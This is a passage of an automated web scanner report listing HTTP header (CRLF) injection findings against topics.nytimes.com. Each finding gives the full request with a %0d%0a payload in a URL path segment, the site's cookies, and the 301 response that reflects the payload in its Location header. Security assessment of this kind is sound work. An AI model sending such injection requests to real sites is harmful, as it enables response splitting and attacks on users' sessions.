GET /top/opinion/5f651%0d%0a988d28d4d19/oped/contributors/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/5f651 988d28d4d19/oped/contributors/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/contributors/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 3c52f%0d%0a74ac431d19e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/3c52f%0d%0a74ac431d19e/contributors/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/3c52f 74ac431d19e/contributors/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/oped/contributors/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload fc78e%0d%0aad7fb1cd36 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/opinion/editorialsandoped/oped/fc78e%0d%0aad7fb1cd36/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 03:01:26 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/fc78e ad7fb1cd36/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload a3d8a%0d%0afeeb0597b5c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/a3d8a%0d%0afeeb0597b5c/timestopics/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:40:48 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/a3d8a feeb0597b5c/timestopics/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 1ba27%0d%0a30fc9b65d99 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/1ba27%0d%0a30fc9b65d99/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:40:48 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/1ba27 30fc9b65d99/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/organizations/p/park51/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 12c7d%0d%0ad02959b441 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/12c7d%0d%0ad02959b441/timestopics/organizations/p/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/12c7d d02959b441/timestopics/organizations/p/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/organizations/p/park51/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 9a0c4%0d%0a26bcdaf529 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/9a0c4%0d%0a26bcdaf529/organizations/p/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/9a0c4 26bcdaf529/organizations/p/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/organizations/p/park51/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 2d70a%0d%0a0b18576cfa6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/2d70a%0d%0a0b18576cfa6/p/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/2d70a 0b18576cfa6/p/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/organizations/p/park51/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload ca929%0d%0a23e3cdede98 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/organizations/ca929%0d%0a23e3cdede98/park51/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:33 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/organizations/ca929 23e3cdede98/park51/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/organizations/p/park51/
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload 6e96e%0d%0a3e5641ba8fc was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/organizations/p/6e96e%0d%0a3e5641ba8fc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:42:34 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/organizations/p/6e96e 3e5641ba8fc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/people/m/madonna/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 9c59a%0d%0a76e21e137a4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/9c59a%0d%0a76e21e137a4/timestopics/people/m/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/9c59a 76e21e137a4/timestopics/people/m/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/people/m/madonna/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload bb56f%0d%0a3e3182b0228 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/reference/bb56f%0d%0a3e3182b0228/people/m/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/bb56f 3e3182b0228/people/m/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/people/m/madonna/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 416d4%0d%0a59dfc04082f was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/416d4%0d%0a59dfc04082f/m/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/416d4 59dfc04082f/m/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/people/m/madonna/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 105b9%0d%0a853f313a162 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/people/105b9%0d%0a853f313a162/madonna/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/people/105b9 853f313a162/madonna/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/people/m/madonna/
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload c3f03%0d%0ae6b0f96142d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /top/reference/timestopics/people/m/c3f03%0d%0ae6b0f96142d/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:41:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/reference/timestopics/people/m/c3f03 e6b0f96142d/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 919c2%0d%0ada221e78489 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/919c2%0d%0ada221e78489/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
